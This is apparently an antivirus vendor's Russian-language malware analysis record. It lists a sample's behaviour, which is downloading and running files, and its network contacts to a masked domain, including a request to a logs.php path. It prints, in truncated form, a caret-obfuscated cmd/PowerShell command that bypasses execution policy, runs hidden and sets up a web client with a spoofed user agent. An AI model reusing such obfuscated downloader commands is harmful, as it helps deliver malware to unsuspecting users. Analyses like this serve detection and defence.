Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /k ^powe^rs^h^e^ll -Executi^onPo^licy by^pass -n^oprofi^le -wi^ndows^tyle hi^dden $wc = New-Object System^.Net.Webclient;$wc.Hea^ders.Ad^d('Us^er-Ag^ent','Windows-Media-Player/11.0.5721.5145');...
Сетевая активность
Подключается к
- 'ju####s-gift.com':80
TCP
Запросы HTTP GET
- http://ju####s-gift.com/public/php/logs.php
UDP
- DNS ASK ju####s-gift.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /k ^powe^rs^h^e^ll -Executi^onPo^licy by^pass -n^oprofi^le -wi^ndows^tyle hi^dden $wc = New-Object System^.Net.Webclient;$wc.Hea^ders.Ad^d('Us^er-Ag^ent','Windows-Media-Player/11.0.5721.5145');... (со скрытым окном)
